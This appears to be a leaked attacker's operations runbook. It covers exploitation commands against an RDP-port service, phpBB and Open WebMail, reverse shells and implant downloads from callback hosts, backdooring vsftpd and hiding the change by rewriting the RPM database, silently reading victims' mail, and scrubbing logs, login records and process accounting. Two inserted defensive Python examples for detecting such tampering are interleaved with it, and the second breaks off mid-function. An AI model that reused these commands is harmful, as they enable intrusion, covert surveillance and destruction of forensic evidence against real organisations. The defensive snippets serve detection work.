#./emptybowl.py 127.0.0.1 3389 'mkdir /tmp/.scsi ; cd /tmp/.scsi && telnet PITCH_IP NETCAT_PORT < /dev/console | uudecode && uncompress sendmail.Z && chmod 700 sendmail && PATH=. D="-cPITCH_IP:NOPEN_PORT" sendmail;'
(sh&0 2>&0)
##### use this one
nc -l -vv -p 33333
./emptybowl.py 555.1.9.115 3389 "/usr/bin/ksh -c \"sh&0 2>&0\""
##### or this with doublet:
./emptybowl.py 555.1.9.115 3389 "/usr/bin/ksh -c \"cat < /dev/tcp/555.1.14.111/33333 | /bin/sh 2>&1 | cat > /dev/tcp/555.1.14.111/44444 2>& 1\""
# on redirector
netstat -an | grep LISTEN
# look for low ports to use for doublet that are not
# being used on the redirector (21,22,22,53,79,80,443...)
# substitute LOW_PORT_1, LOW_PORT_2 with ports decided
# from the above netstat command
doublet -O LOW_PORT_1 LOW_PORT_2
# change LOW_PORT_1, LOW_PORT_2, and PITCH_IP
./emptybowl.py 127.0.0.1 3389 "/bin/ksh -c \"cat < /dev/tcp/PITCH_IP/LOW_PORT_1 | /bin/sh 2>&1 | cat > /dev/tcp/PITCH_IP/LOW_PORT_2 2>& 1\""
#./emptybowl.py 127.0.0.1 3389 '(telnet PITCH_IP LOW_PORT_1 ; sleep 1) | /bin/sh | telnet PITCH_IP LOW_PORT_2'
# in doublet window
unset HISTSIZE
unset HISTFILESIZE
unset HISTFILE
w
pwd
id
cd /tmp
mkdir .scsi
cd .scsi
# locally
packrat RAND_PORT
# packrat command
gedit sendmail.Z.uu
# in doublet
pwd
# make sure in /tmp/.scsi
/usr/bin/uudecode; ls -latr
copy/paste gedit contents into this window
uncompress sendmail.Z
ls -l
chmod 700 sendmail
PATH=. sendmail
# from redirector
-nstun TARGET_IP
# restart mcgate doublet window on TARGET_IP
# close tunnels on PITCH_IP
# start a new NOPEN with 'at' to avoid inheritance of listening socket
-cd /tmp/.scsi
echo "./sendmail" | at now
# from PITCH_IP
-nstun TARGET_IP:32755
# burn this NOPEN to free up socket; from original NOPEN
# started (32754) on TARGET_IP
-burnBURN
# NOPEN 2:
# now restart mcgate in new NOPEN - use at again to prevent mcgate
# from being terminated on exit.
-cd /opt/aimc/setup
echo "./mcgate" | at now
-cd /tmp/.scsi
ps -ef | grep mcgate
# ELEVATE with extremeparr (dtappgather)
# after ELEVATE with extremeparr (dtappgather)
# and restarting noserver (sendmail), connect with
-nstun TARGET_IP:32754
-rm sendmail
# burn nopen window on TARGET_IP with id of aimc
id
-burnBURN
#
# cleanup
-lt /opt/aimc/setup/
# remove core file
-rm /opt/aimc/setup/core
# in mcgate's directory; the following will be appended to mcgate.YYYYMMDD:
Fri Feb 11 16:36:49 2005: cmdopen --- : 0 : current cmd: uapi -u -f userPassword -e ********************************************
Fri Feb 11 16:36:49 2005: cmdopen --- : 0 : Result: rc= -5 len=0
-get /opt/aimc/setup/mcgate.YYYYMMDD
# locally
cp /current/down/../HOSTNAME.IP/opt/aimc/setup/mcgate.YYYYMMDD /current/up/m
# remove above entries; please leave the mcgate
# start values even the one we started. For example, leave:
Fri Apr  8 16:12:28 2005: main --- : 0 : Current server port is 3389
vi /current/up/m
# on target
-put /current/up/m m
-ls -n /opt/aimc/setup/mcgate.YYYYMMDD
cat m > /opt/aimc/setup/mcgate.YYYYMMDD
-tail /opt/aimc/setup/mcgate.YYYYMMDD
# use -touch -t command from -ls -n output to
# reset timestamp on /opt/aimc/setup/mcgate.YYYYMMDD and
# /opt/aimc/setup. For example:
-touch -t 1112992709:1112992787 /opt/aimc/setup/mcgate.YYYYMMDD
-touch -t 1112992709:1112992787 /opt/aimc/setup
-rm m
at -l
-lt /var/spool/cron /var/spool/cron/atjobs
-touch /var/spool/cron/crontabs /var/spool/cron/atjobs
-cd ..
-rm .scsi
###### PORKED VSFTP Server #################################
# check to see if can use DIZZYTACHOMETER to remove mismatched vsftpd
rpm --version
whereis vsftpd
rpm -qf /usr/sbin/vsftpd
rpm -V vsftpd-1.1.3-8
-lt /usr/lib/librpm-4.1.so /usr/lib/librpmdb-4.1.so /usr/lib/librpmio-4.1.so /usr/lib/libpopt.so /usr/lib/libbeecrypt.so /usr/lib/libbz2.so
# or
-lt /usr/lib/librpm-4.2.so /usr/lib/librpmdb-4.2.so /usr/lib/librpmio-4.2.so /usr/lib/libpopt.so /usr/lib/libbeecrypt.so /usr/lib/libbz2.so
-lt /usr/sbin/vsftpd
# normal vsftpd md5sum: 11111ecd2d3ab44015eae3592fcfaec7
# porked vsftpd md5sum: bde8b06829df05be8be4b5972a2d4a39
md5sum vsftpd
-put /current/up/it it
./it /usr/sbin/vsftpd
cp /usr/sbin/vsftpd ?
-put /current/up/vsftpd vsftpd
cp vsftpd /usr/sbin/vsftpd
# use itime results to reset vsftpd times to original settings
./it /usr/sbin/vsftpd
service vsftpd stop
service vsftpd start
######## Trigger porked vsftpd
### in local window, get nopen ready
packrat -z NETCAT_PORT
### on redirector, get nopen listener ready
-nrtun NOPEN_PORT
### on redirector, set up tunnel, use a "pork source port" from list below
-tunnel l 21 TARGET_IP 21 SPORT r NETCAT_PORT
### in scripted local window, send pork trigger
#Usage: ./client -t|-u timeadj sport hostname dport command
#sport: 3 51 3854 5671 8213 12634 16798 23247 35139 47923 53246 63201
#./client -t|-u [tcp/udp] timeadj sport [(valid source ports for the server are: 3, 51, 3854, 5671, 8213, 12634, 16798, 23247, 35139, 47923, 53246, 63201)] hostname [Host IP] dport [(port on which PORKified daemon is listening)] command
./client -t 0 SPORT 127.0.0.1 21 "cd /tmp;mkdir -p .scsi && cd .scsi; cat < /dev/tcp/PITCH_IP/NETCAT_PORT > sendmail.uu && uudecode sendmail.uu && chmod 755 sendmail && PATH=. S=1 D=\"-cPITCH_IP:NOPEN_PORT\" ./sendmail"
# use DIZZYTACHOMETER to hide package mismatches
############## DIZZYTACHOMETER #################
# Most Linux distributions contain an RPM database which stores information on installed files. Thus, if a system file is
# modified, the rpm "Verify" command easily alerts the sysadmin to the changed file. DIZZYTACHOMETER alters a computer's
# RPM (4.1 or higher) database in order to hide a modified file. This is essential when dropping down implants such
# as Jackladder and Pork.
# Works on Redhat 8 (rpm version 4.1), Redhat 9 (rpm version 4.2), and Mandrake 9.2 (version 4.2)
rpm --version
./DizzyTach -p "packageName" [-f "filepath\file"] [-d] [-r] [-c] [-s] [-m] [-t] [-q] [-V]
or
ARGS="-p "packageName" [-f "filepath\file"] [-d] [-r] [-c] [-s] [-m] [-t] [-q] [-V] [-R]" ./DizzyTach
# library dependencies in /usr/lib:
#
# librpm-4.1.so
# librpmdb-4.1.so
# librpmio-4.1.so
# libpopt.so
# libbeecrypt.so
# libbz2.so
-lt /usr/lib/librpm-4.1.so /usr/lib/librpmdb-4.1.so /usr/lib/librpmio-4.1.so /usr/lib/libpopt.so /usr/lib/libbeecrypt.so /usr/lib/libbz2.so
# or
-lt /usr/lib/librpm-4.2.so /usr/lib/librpmdb-4.2.so /usr/lib/librpmio-4.2.so /usr/lib/libpopt.so /usr/lib/libbeecrypt.so /usr/lib/libbz2.so
example:
# Suppose we want to hide /usr/sbin/vsftpd from RPM
$ whereis vsftpd
vsftpd: /usr/sbin/vsftpd
# Find the rpm package that is responsible for this file.
$ rpm -qf /usr/sbin/vsftpd
vsftpd-1.1.3-8
# Run the rpm "Verify" command on the vsftpd-1.1.3-8 package.
rpm -V vsftpd-1.1.3-8
S.5....T   /usr/sbin/vsftpd
# S, 5, and T were output. This means the vsftpd binary has a different size, md5, and modification time than the
# rpm database.
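### Added example (not a tool from these notes): the rpm -V check above only compares a file to the
### host's own RPM database, which is exactly what DIZZYTACHOMETER rewrites, so a clean "rpm -V"
### proves nothing once the database has been touched. The Python below verifies package files
### against a hash baseline carried in from outside the host (a clean image, a recorded baseline,
### or the vendor package) and compares file contents directly. The two md5 values are the ones
### quoted above for the stock and porked vsftpd-1.1.3-8; the paths and sample file contents in
### demo() are constructed so the script runs offline.

```python
#!/usr/bin/env python3
"""Verify package-managed binaries against a hash baseline that does not come
from the host's own RPM database (added example, not from the original notes)."""
import hashlib
import os
import tempfile
from typing import Dict, Iterable, Optional, Tuple

# md5 values quoted in the notes (md5 because that is what the notes use;
# a real baseline should record sha256 alongside it).
KNOWN_GOOD_MD5 = {"/usr/sbin/vsftpd": "11111ecd2d3ab44015eae3592fcfaec7"}
KNOWN_BAD_MD5 = {"bde8b06829df05be8be4b5972a2d4a39": "porked vsftpd-1.1.3-8 (per notes)"}


def file_digest(path: str, algo: str = "md5") -> str:
    """Hash a file in chunks so large binaries are not read into memory at once."""
    h = hashlib.new(algo)
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(1 << 16), b""):
            h.update(chunk)
    return h.hexdigest()


def classify(digest: Optional[str], expected: str) -> str:
    """Map an observed digest to a verdict; the implant list is consulted
    before falling back to a generic mismatch."""
    if digest is None:
        return "MISSING"
    if digest == expected:
        return "OK"
    if digest in KNOWN_BAD_MD5:
        return "KNOWN_IMPLANT"
    return "MODIFIED"


def build_baseline(root: str, paths: Iterable[str]) -> Dict[str, str]:
    """Record digests from a trusted tree, e.g. a clean image mounted at `root`."""
    return {p: file_digest(os.path.join(root, p.lstrip("/"))) for p in paths}


def verify_tree(baseline: Dict[str, str], root: str = "/") -> Dict[str, Tuple[str, Optional[str]]]:
    """Compare every baseline entry against the live tree rooted at `root`.
    Returns {path: (verdict, observed_digest)}."""
    results = {}
    for path, expected in baseline.items():
        full = os.path.join(root, path.lstrip("/"))
        digest = file_digest(full) if os.path.isfile(full) else None
        results[path] = (classify(digest, expected), digest)
    return results


def demo() -> Dict[str, str]:
    """Constructed scenario: baseline a 'clean' vsftpd, then observe the same
    path after a same-size replacement (rpm's S flag would not fire) and
    after deletion."""
    with tempfile.TemporaryDirectory() as root:
        sbin = os.path.join(root, "usr", "sbin")
        os.makedirs(sbin)
        target = os.path.join(sbin, "vsftpd")
        with open(target, "wb") as fh:
            fh.write(b"\x7fELF stock  vsftpd (constructed sample)")
        baseline = build_baseline(root, ["/usr/sbin/vsftpd"])
        stock = verify_tree(baseline, root)["/usr/sbin/vsftpd"][0]
        with open(target, "wb") as fh:  # same length, different content
            fh.write(b"\x7fELF porked vsftpd (constructed sample)")
        swapped = verify_tree(baseline, root)["/usr/sbin/vsftpd"][0]
        os.remove(target)
        gone = verify_tree(baseline, root)["/usr/sbin/vsftpd"][0]
    return {
        "stock": stock,
        "swapped": swapped,
        "removed": gone,
        # the porked md5 from the notes, checked against the stock md5 from the notes
        "notes_hash": classify("bde8b06829df05be8be4b5972a2d4a39",
                               KNOWN_GOOD_MD5["/usr/sbin/vsftpd"]),
    }


if __name__ == "__main__":
    for name, verdict in demo().items():
        print(f"{name}: {verdict}")
```

### Run it from read-only media against a baseline recorded before the host was exposed; a baseline
### built on the suspect host after the fact would just re-bless the replaced file.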
-put /current/up/DIZZYTACHSTATIC rpmStatic
# final command would be:
$ ./rpmStatic -p vsftpd-1.1.3-8 -f /usr/sbin/vsftpd -s -m -t -d -r -c
Reset: OK
SigRepair: NO
Lookup OK
Sig Exists
Reset: OK
-d: OK
-m: UPDATED
-s: UPDATED
-t: UPDATED
Commit: OK
Tested write of 8392 bytes
Performed write of 8392 bytes
Reset: OK
-r: OK
Commit: OK
Tested write of 8392 bytes
Performed write of 8392 bytes
Reset: OK
# Check to see if the "vsftpd" is now hidden from rpm
$ rpm -V vsftpd-1.1.3-8
# This time, /usr/sbin/vsftpd is not output. Our modified file is now hidden from RPM!
-rm rpmStatic
############################ ESMARKCONANT ##################################
# Exploits a vulnerability in the phpBB forum software.
# No authentication is required.
# target to be running phpBB less than version 2.0.11
# usage: ./xp_phpbb.pl -i -t -c
#   -i
#   -t
#   -c
#./xp_phpbb.pl -i http://127.0.0.1:80/forum/ -t1 -c"uname -a;ls -la;w"
#./xp_phpbb.pl -i http://127.0.0.1:80/forum/ -t1 -c"(mkdir /tmp/.scsi; cd /tmp/.scsi; /usr/bin/wget http://555.1.2.150:5555/sendmail -O sendmail;chmod +x sendmail;D=-c555.1.2.150:9999 PATH=. sendmail) 2>/dev/null"
# 2 step troubleshooting
-tunnel l 80 TARGET_IP r NETCAT_PORT
nc 127.0.0.1 80
telnet 127.0.0.1 80
GET /phpBB2/ HTTP/1.0
# response should be:
# Powered by phpBB 2.0.4
# determine if viewtopic.php is vulnerable
./xp_phpbb.pl -i http://127.0.0.1:80/forum/ -t1 -c"uname -a;ls -la;w"
# response should have the output of the commands in the request:
# ...
#
cd /current/up #locally to setup fowget to put rat on target since no uudecode echo -e "HTTP/1.0 200\n" > new cat new noserver > sendmail nc -v -l -p NETCAT_PORT < sendmail # on PITCH -nrtun RAND_PORT # upload and execute nopen ./xp_phpbb.pl -i http://127.0.0.1:80/forum/ -t1 -c"(mkdir /tmp/.scsi; cd /tmp/.scsi; /usr/bin/wget http://PITCH_IP:NETCAT_PORT/sendmail -Osendmail;chmod +x sendmail;D=-cPITCH_IP:RAND_PORT PATH=. sendmail) 2>/dev/null" # clean web access log ######### SNMPWALK -tunnel u 161 TARGET_IP snmpwalk 127.0.0.1 -c COMMUNITY_STRING .system #snmpwalk -v1 -c Ult1mate 127.0.0.1 .system #snmpwalk -v2c -c Ult1mate 127.0.0.1 .system #snmpwalk -v1 -c tenkap 127.0.0.1 enterprises.9.9.23.1 # Software info.... snmpwalk 555.1.2.240 -c COMMUNITY_STRING jetson .system # Hardware info ..... snmpwalk 555.1.2.240 -c COMMUNITY_STRING jetson 47.1.1.1.1.2 # CDP neighbors snmpwalk 555.1.2.240 -c COMMUNITY_STRING jetson enterprises.9.9.23.1 # Flash Stuff snmpwalk 555.1.2.240 -c COMMUNITY_STRING jetson 16 snmpwalk 555.1.2.240 -c COMMUNITY_STRING jetson enterprises.9.2.10.17.1.1 # Arp Cache snmpwalk 555.1.2.240 -c COMMUNITY_STRING jetson ip.ipNetToMediaTable.ipNetToMediaEntry.ipNetToMediaPhysAddress # Route info # not sure on this one what you want.... # gives 1500 lines on our jetson.net switches snmpwalk 555.1.2.240 -c COMMUNITY_STRING jetson ip.ipRouteTable |wc ##################################################### # EVOKEPROMPT ##################################################### # In netscape/mozilla to get magic cookie: # Tools->Cookie Manager->Manage Stored Cookies # click on your cookie; take note of name and Information # change name-sessionid and OWVSdif1.AMY to name and Information # for the following command # change callback IP in /etc/hosts, add the dns target name to 127.0.0.1 1.EVOKEPROMPT Software Description: - Exploits a vulnerability in a CGI against the Open WebMail system. 
The request is parsed by the openwebmail-folder.pl CGI and is transferred to a perl open call which allows arbitrary command execution. Open WebMail runs on FreeBSD, Linux, Solaris, and most Unix servers. - The Open WebMail system runs as "nobody", therefore a local exploit is needed if root access is required. - Since it's a logic error, the same exploit will work on all versions of Unix. 2.EVOKEPROMPT Usage: # ./xp_downloadfolder usage: ./xp_downloadfolder -i -u -a -b -p -c -i -p -c -u -a -b Examples: 1) ./xp_downloadfolder -i127.0.0.1 -ufuzz -a"OWNkEmsJpDdMg" -b0.0195130566871775 -c"mkdir /tmp/.scsi; cd /tmp/.scsi; catsendmail;chmod +x sendmail;sleep 60;PATH=. D=-c555.1.2.150:5555 sendmail" 2) ./xp_downloadfolder -i127.0.0.1 -ufuzz -a"OWNkEmsJpDdMg" -b0.0195130566871775 -c"PATH=/usr/bin w" 3) ./xp_downloadfolder -i127.0.0.1 -ufuzz -a"OWNkEmsJpDdMg" -b0.0195130566871775 -c"sh&0 2>&0" 3.Target Susceptablility: EVOKEPROMPT requires the target to be running Open WebMail 2.10 or higher. 4.On what will EVOKEPROMPT fail? Will not work on older versions of Open WebMail. Versions that will not work include Open WebMail 1.80, 1.90, 2.00. 5.EVOKEPROMPT Additional Requirements: Need username/password to authenticate. Local exploit based upon the operating system. Could use DTAPPGATHER for Solaris, rfork for FreeBSD, or ptrace for Linux. 6.Give troubleshooting instructions: There are the steps in troubleshooting EVOKEPROMPT: 1. Determine if the webserver is running Open WebMail 2.10 or higher: # galeon http://targetip/ 2. Determine the OS based upon "User Preference/About" in the Open WebMail system. 7.EVOKEPROMPT Example Usage: 1) # galeon http://127.0.0.1/ 2) Enter the UserID and Password. For the rest of this example, UserID is name. 3) Set up Nopen to listen for a connection. # noclient -l 123 or # -nrtun 123 4) View the cookie for "Site" (in this case, 127.0.0.1) and "Cookie Name" (in this case, name- sessionid). 
The value should be similar to this: OWVSdiyf1.AMY 5) Also, need to use the session ID in the URL, for example: sessionid=name*-session-0.2724838 93045322 6) Send the exploit using xp_downdloadfolder with the above information: # ./xp_downloadfolder -i127.0.0.1 -uname -a"OWNkEmsJpDdMg" -b0.0195130566871775 -c"mkdir / tmp/.scsi; cd /tmp/.scsi; catsendmail;chmod +x sendmail;sleep 60;PATH=. D=-c555.1.2.150:123 sendmail" # this worked on faintspirit ./xp_downloadfolder -i127.0.0.1 -utonggl -a"OWKyenMN8jyV2" -b0.125111049580486 -c"/usr/bin/wget http://203.234.72.4:443" # others ./xp_downloadfolder -i127.0.0.1 -utonggl -a"OWXIer7nk2%2FpM" -b0.535692078600736 -c"(sh&0 2>&0)" ./xp_downloadfolder -i127.0.0.1 -utonggl -a"OWKyenMN8jyV2" -b0.125111049580486 -c"sh&0 2>&0" ./xp_downloadfolder -i127.0.0.1 -utonggl -a"OWKyenMN8jyV2" -b0.125111049580486 -c"/usr/bin/w; /bin/date" ./xp_downloadfolder -i127.0.0.1 -utonggl -a"OWKyenMN8jyV2" -b0.125111049580486 -c"/usr/bin/wget http://203.234.72.4:443" ./xp_downloadfolder -i127.0.0.1 -utonggl -a"OWKyenMN8jyV2" -b0.125111049580486 -c"/usr/bin/wget http://203.234.72.4:443" ./xp_downloadfolder -i127.0.0.1 -utonggl -a"OWKyenMN8jyV2" -b0.125111049580486 -c"mkdir /tmp/.scsi; cd /tmp/.scsi; /usr/bin/wget http://203.234.72.4:443/sendmail; chmod 700 sendmail; PATH=. 
D=-c203.234.72.4:46776 sendmail" # abort the curl command, then modify the string to have the "ow-sessionkey-mail.ihep.ac.cn-", https://127.0.0.1:443, and "=tonggl*mail.ihep.ac.cn-session-" info included # wget nopen (this worked): curl --cookie "ow-sessionkey-mail.ihep.ac.cn-tonggl=OWKyenMN8jyV2" "https://127.0.0.1:443/cgi-bin/openwebmail/openwebmail-folder.pl?sessionid=tonggl*mail.ihep.ac.cn-session-0.125111049580486&folder=|(echo%20%27mkdir%20FtmpFEscsi%3B%20cd%20FtmpFEscsi%3B%20FusrFbinFwget%20http%3AFF2G3E234E72E4%3A443Fsendmail%3B%20chmod%207GG%20sendmail%3B%20PATH%3DE%20D%3D-c2G3E234E72E4%3A46776%20sendmail%27%7CPATH%3D%60printf%20%27%5C057usr%5C057bin%27%60%20tr%20E-G%20.-0%7CPATH%3D%60printf%20%27%5C057bin%27%60%20sh)&action=downloadfolder" ### In a local scripted window, set up a netcat to listen for a connection: nc -vv -l -p NETCAT_PORT ### try connecting via netcat after any "session failed" message when redirecting: unset HISTSIZE unset HISTFILESIZE unset HISTFILE w uname -a ### start a netcat with the right nopen version (don't need to uuencode with /dev/tcp way) ### nc -l -p NETCAT_PORT < sendmail pwd mkdir /tmp/.scsi; cd /tmp/.scsi; pwd ls -l /usr/bin/uudecode /bin/cat/tmp/.scsi/sendmail chmod 700 sendmail PATH=. 
sendmail id grep -v "203.234.72.4" /home/ihep/tonggl/.openwebmail -gs grepout -d -w /tmp/.scsi "203.234.72.4" /home/ihep/tonggl/.openwebmail/history.log -gs grepout -d -w /tmp/.scsi "203.234.72.4" /home/ihep/chep2001/.openwebmail/history.log -gs grepout -d -w /tmp/.scsi "203.234.72.4" /var/log/openwebmail.log grep -v "203.234.72.4" /var/log/openwebmail.log> o; cat o > /var/log/openwebmail.log 7) Check the following logs and directories: /home/name/.openwebmail/history.log /var/log/httpd/access_log /var/log/openwebmail.log /home/name/mail /home/name /var/www/cgi-bin/openwebmail/etc/sessions/ ##################################################### # POPPING MAIL FROM A TARGET ##################################################### ### You'll be listing the messages from within a scripted window ### You'll need to devise a way to separate the mail for multiple users (for tuckering) ### if you are accessing more than one account ### You might try using a separate scripted window for each user, then copying ### the scripted window to the name of the user for post-processing ### The session timeout is fairly short so have your commands ready to paste ### You have to "guess" where the newest mail is, so you might want to start ### backwards to get the most recent mail, IF that applies and the mail is ### sorted by date ### IMPORTANT!!!!!! DO NOT "QUIT" THE SESSION!!!! LET IT TIMEOUT, ### OR CLOSE THE TUNNEL TO HAVE IT DROP THE CONNECTION. ### You do not want the mail marked as "read" or anything else. ### set up tunnels on redirector: -tunnel l 110 TARGET_IP ### in a local scripted window: telnet 127.0.0.1 110 USER PASS LIST RETR 1 RETR 2 RETR 3 RETR 4 RETR 5 RETR 6 RETR 7 RETR 8 RETR 9 RETR 10 ... ... ... ### If the session hasn't timed out, close the tunnel channel to move on to the ### next user or to end the op ############################################################################# ############ I AM ROOT! 
#############################################################################
###path with NO Working directory for atjob
#-setenv PATH=:/usr/bsd:/bin:/usr/bin:/sbin:/usr/sbin:/etc:/usr/etc
-setenv PATH=/usr/bin:/bin:/usr/sbin:/sbin:/usr/local/bin
HISTFILE="" ksh
# or
unset HISTFILE
unset HISTSIZE
unset HISTFILESIZE
-ls
-rm sendmail sendmail.uu
# Look for and clean (if necessary) logs

###### FORENSICS ##############
=info
df -k
-find
-gs survey
-ls /var/spool/cron/crontab
-strings /platform
## /platform/SUNW,SystemEngine
### See who's on, note uptime and load; verify time/timezone; see who's been on
w; date; last -80
### Change owner/group/modes...if in doubt, see what's already in "/tmp"...
-ls -t / /tmp
### core files?
-ls /core
### Root users:
-ls /var/adm/sulog
-vget /var/adm/sulog
### owner:group should be root:sys...
chown -R root:sys /tmp/.scsi; chmod -R og-rwx /tmp/.scsi; ls -al
### Baseline swap
/sbin/ps -elf; swap -l; uptime
### Enough space to upload tools? Any partitions about to fill up?
df -k

################ OTHER CLEANING ################
#################################
### TOAST the login entries.....
#################################
### Target window
-put ../up/toast t
### TO VIEW...
./t -u /var/adm/utmp
./t -u /var/adm/wtmp | tail -20
./t -x /var/adm/utmpx
./t -x /var/adm/wtmpx | tail -20
./t -l /var/adm/lastlog | tail
### TO ZAP...
./t -u /var/adm/utmp tty date
./t -u /var/adm/wtmp tty date
./t -x /var/adm/utmpx tty date
./t -x /var/adm/wtmpx tty date
./t -l /var/adm/lastlog /var/adm/wtmp[x] user

#################################
### SGREP messages
#################################
-put ../up/sgrep s
-tail /var/adm/messages
### To look first:
./s "unique string" /var/adm/messages
### To replace with a string of equal or shorter length
./s "unique string" "replacement string" /var/adm/messages

#################################
### SGREPSUB (numerous things to grep)
#################################
usage: sgrepsub -i /tmp/messages -r /tmp/rand -c 31 -i -r -c to find the column number> -h -f -s
ex: sgrepsub -i /tmp/messages -r /tmp/rand -c 31 -f /var/log/messages
### Locally, create a file containing the lines you want to change from /var/adm/messages
cd /current/down
vi sg.input
### Locally, create a 2nd file containing one or more lines of replacement strings
cd /current/down
vi sg.repl
### Locally, run
sgrepsub -i sg.input -r sg.repl -c -f /var/adm/messages -s ./s
### Verify the output, then paste the generated commands in the target window

#################################
### PCLEAN (put up right one)
#################################
-put ../up/pcleanTAB sendmail
-ls
### make sure to exit all but one window (processes log upon completion)
### Pclean usage:
### -e: look for null entries
### -i: calc number of entries in file
### -r: looks for entries with gid=root
### -t: search this time range
### -l: search for last X hours
### -S: ignore matches in the following string?
### Usage: ./pclean [-h(elp)] [-d] [selection_option(s)] [filename]
###   -d: DELETE selected entries
###   Selection options: (Two or more selection options are ANDed together)
###   --------------------------------------------------------------------
###   no options: print all entries to stdout and exit
###   -h(elp): self expl
###   -e: list null entries; all other select criteria ignored
###   -f fname: delete whitespace-separated numeric entries listed in "fname"
###             (numbers must be in numeric order -- try the "sort -n" option if necessary)
###   -r: list entries w/ gid == root
###   -i: calculate # of entries in the file (all other selection options ignored)
###   -l num_hrs: list entries whose start time was within last num_hrs hours
###   -n numeric_list: select numeric ranges and/or individual entries
###      (numeric list CANNOT have spaces and MUST be in numeric order and comma-separated)
###      e.g.: -n 1-1024,1080,6666,31337
###      ** NOTE: USING EITHER THE -n OR -L OPTION CAN
###      ** SIGNIFICANTLY IMPROVE PROCESSING TIME
###   -L number: select the last number of entries
###      ** NOTE: USING EITHER THE -n OR -L OPTION CAN
###      ** SIGNIFICANTLY IMPROVE PROCESSING TIME
###   -k numeric_list: slower version of -n (doesn't use lseek)
###   -t time_range: entries that fall within time range, specified as
###      [[CC]YY]MMDDhhmm[.SS]-[[CC]YY]MMDDhhmm[.SS] (no spaces)
###      e.g. 8 Jul 1999 from 10am to 11am: -t 199907081000-199907081100
###   -c cmd_name: strncmp() search for 1st 8 chars of commands that match cmd_name
###   -s "cmd1|cmd2|...": strncmp() search for 1st 8 chars of commands that DO match
###      a list of '|' separated strings (kinda like egrep)
###   -S "cmd1|cmd2|...": strncmp() search for 1st 8 chars of commands that DON'T match
###      a list of '|' separated strings (kinda like egrep -v)

### LOCALLY, make pclean dir
-lsh mkdir /current/down/pclean
### Make sure your path is correct:
### redo path with WORKINGDIR
-addpath .
### or equivalently:
### DEC:
#-setenv PATH=/usr/.advtags:/bin:/usr/bin:/sbin:/usr/sbin:/etc:/usr/etc:/usr/ucb
### OTHER:
#-setenv PATH=/tmp/WORK_DIR:/bin:/usr/bin:/sbin:/usr/sbin:/etc:/usr/etc:/usr/ucb

### newer way
#### Checks number of processes in file? Informational
#### This one doesn't do any cleaning yet.
sendmail -i; date
### This works for ICESKATE (DEC)
#sendmail -r -l 4 -S "sendmail|imapd|idled|mail.lo|popper|sshd|in.ident|syslogd|telnetd|ipop3d|imapd" > T:/current/down/pclean/o
## safest way for SPARC
sendmail -l 4 > T:/current/down/pclean/o

### Locally, edit file and remove any excess entries
### Use following on local host to convert into input format:
cp o o.orig
### Delete header and footer lines, along with any processes that
### don't appear to be us
vi o
### Convert the file into input format (process ref numbers only):
### OR in vi:   :%s/ .*//g
cut -f1 -d ' ' o > i
# or
cut -f1 -d ' ' o.grep > i
### Verify the file to be uploaded is correct:
cat i
### upload input file
-put /current/down/pclean/i i
-ls

### DON'T RUN ANY MORE NON-BUILTIN COMMANDS ON TARGET AFTER THIS COMMAND!!!!!
### (every non-builtin you run after this writes a fresh accounting record)
### Delete our entries
sendmail -d -f i > T:/current/down/pclean/o.after
### Locally, edit file and remove any excess entries
### verify pclean worked:
cat o.after
### Paste the final 'sendmail' cleanup line from o.after on the target
### until it says "no entries selected"

### Extra cleanup
### reset timestamp on /usr after rm /usr/.advtags
-rm sendmail i
### DO NOT RUN ANY MORE NON-BUILTIN COMMANDS or you'll HAVE TO PCLEAN AGAIN!!!!
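The toast and pclean steps above remove individual records from utmp/wtmp, lastlog and the accounting file. Seen from the other side, how much that leaves behind depends on how the record is removed: a record overwritten in place stays as an all-NUL slot and orphans its logout, while a record spliced out leaves wtmp internally consistent and only the external sources (sulog, messages, pacct, remote syslog) can contradict it. The parser below is an added example, not a tool from this runbook; it assumes the glibc `struct utmp` layout of Linux x86_64 (384-byte records), not the Solaris utmpx layout the commands above operate on, and the sample wtmp it audits is constructed inline.

```python
import struct

# glibc `struct utmp` on Linux x86_64 (384 bytes). Assumption for this example;
# Solaris utmpx, which the ./t commands above edit, has a different layout.
UTMP_FMT = "<hxxi32s4s32s256shhiii4i20s"
UTMP_SIZE = struct.calcsize(UTMP_FMT)              # 384
BOOT_TIME, USER_PROCESS, DEAD_PROCESS = 2, 7, 8     # ut_type values from <utmp.h>


def make_record(ut_type, pid, line, user, host, ts):
    """Pack one record; used only to build the constructed sample below."""
    return struct.pack(UTMP_FMT, ut_type, pid, line.encode(), line[-4:].encode(),
                       user.encode(), host.encode(), 0, 0, 0, ts, 0,
                       0, 0, 0, 0, b"")


# Constructed sample wtmp (not real data): boot, two logins, two logouts.
SAMPLE_WTMP = b"".join([
    make_record(BOOT_TIME,    0,    "~",     "reboot", "2.6.9",        900),
    make_record(USER_PROCESS, 4101, "pts/0", "alice",  "10.0.0.5",    1000),
    make_record(USER_PROCESS, 4177, "pts/1", "bob",    "203.0.113.7", 1100),
    make_record(DEAD_PROCESS, 4177, "pts/1", "",       "",            1200),
    make_record(DEAD_PROCESS, 4101, "pts/0", "",       "",            1300),
])


def parse_wtmp(data):
    """Decode whole records; a trailing partial record is ignored."""
    recs = []
    for i in range(len(data) // UTMP_SIZE):
        chunk = data[i * UTMP_SIZE:(i + 1) * UTMP_SIZE]
        f = struct.unpack(UTMP_FMT, chunk)
        recs.append({
            "index": i, "type": f[0], "pid": f[1],
            "line": f[2].rstrip(b"\0").decode(errors="replace"),
            "user": f[4].rstrip(b"\0").decode(errors="replace"),
            "host": f[5].rstrip(b"\0").decode(errors="replace"),
            "time": f[9],                               # ut_tv.tv_sec
            "zeroed": chunk == b"\0" * UTMP_SIZE,
        })
    return recs


def zero_record(data, idx):
    """Crude cleaner: overwrite one record with NULs, file length unchanged."""
    off = idx * UTMP_SIZE
    return data[:off] + b"\0" * UTMP_SIZE + data[off + UTMP_SIZE:]


def splice_out(data, idxs):
    """Tidier cleaner: drop whole records and close the gap."""
    return b"".join(data[i * UTMP_SIZE:(i + 1) * UTMP_SIZE]
                    for i in range(len(data) // UTMP_SIZE) if i not in idxs)


def audit(recs):
    """Artifacts a reviewer can spot inside wtmp itself (nothing external)."""
    findings, open_lines = [], {}
    for r in recs:
        if r["zeroed"]:
            findings.append(("zeroed record", r["index"]))
        elif r["type"] == USER_PROCESS:
            open_lines[r["line"]] = r["index"]
        elif r["type"] == DEAD_PROCESS:
            if r["line"] in open_lines:
                del open_lines[r["line"]]
            else:
                findings.append(("logout without login", r["index"]))
    live = [r for r in recs if not r["zeroed"]]
    for a, b in zip(live, live[1:]):                    # wtmp is append-only
        if b["time"] < a["time"]:
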